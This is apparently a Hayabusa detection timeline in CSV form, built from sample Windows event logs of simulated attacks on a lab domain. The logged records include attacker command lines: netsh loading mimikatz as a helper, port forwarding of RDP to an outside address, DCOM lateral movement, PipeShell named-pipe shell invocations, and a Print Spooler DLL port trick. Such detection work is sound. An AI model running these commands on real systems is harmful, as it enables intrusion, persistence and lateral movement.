Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-22 
05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut 
force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx 2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx 2021-05-23 
06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-05-28 04:30:47.965 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
2021-05-28 04:30:48.169 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
2021-05-28 04:30:48.170 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
2021-05-28 04:30:48.172 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx"
2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-01 23:09:38.437 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \Microsoft\SynchronizeTimeZone | Content: 2021-06-01T16:09:38.3707854 OFFSEC\admmig \Microsoft\SynchronizeTimeZone 2021-06-01T16:09:35.8747701 true 1 LeastPrivilege OFFSEC\admmig InteractiveToken IgnoreNew true true true false false PT10M PT1H true false true true false false false P3D 7 adf | User: admmig | LID: 0x46b7b4",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 22:05:20.242 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:05:40.097 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:05:40.098 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:05:59.812 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:06.124 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:06.125 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:06.151 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:06.161 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] Waiting for client..`n"" $PipeObject.WaitForConnection() } else { try { # Add a 1s time-out in case the server is not live $PipeObject.Connect($timeout) } catch { echo ""[!] Server pipe not available!"" Return } } $PipeReader = $PipeWriter = $null $PipeReader = new-object System.IO.StreamReader($PipeObject) $PipeWriter = new-object System.IO.StreamWriter($PipeObject) $PipeWriter.AutoFlush = $true Initialize-Session }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:07.156 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:07.157 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:27.069 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:27.070 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -timeout 1000 -c ls,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:27.073 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:28.071 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-03 22:06:28.072 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx
2021-06-04 02:42:33.379 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Resolve-Path): ""Resolve-Path"" ParameterBinding(Resolve-Path): name=""ErrorAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""WarningAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""InformationAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""Verbose""; value=""False"" ParameterBinding(Resolve-Path): name=""Debug""; value=""False"" ParameterBinding(Resolve-Path): name=""Path""; value=""Net*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
2021-06-04 02:42:35.914 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
2021-06-04 02:42:35.915 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-PrinterPort -Name .\NetshHelperBeacon.dll,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-PrinterPort): ""Add-PrinterPort"" ParameterBinding(Add-PrinterPort): name=""Name""; value="".\NetshHelperBeacon.dll"" ParameterBinding(Add-PrinterPort): name=""ComputerName""; value="""" ParameterBinding(Add-PrinterPort): name=""HostName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""PortNumber""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMP""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMPCommunity""; value="""" ParameterBinding(Add-PrinterPort): name=""LprHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""LprQueueName""; value="""" ParameterBinding(Add-PrinterPort): name=""LprByteCounting""; value=""False"" ParameterBinding(Add-PrinterPort): name=""ThrottleLimit""; value=""0"" ParameterBinding(Add-PrinterPort): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
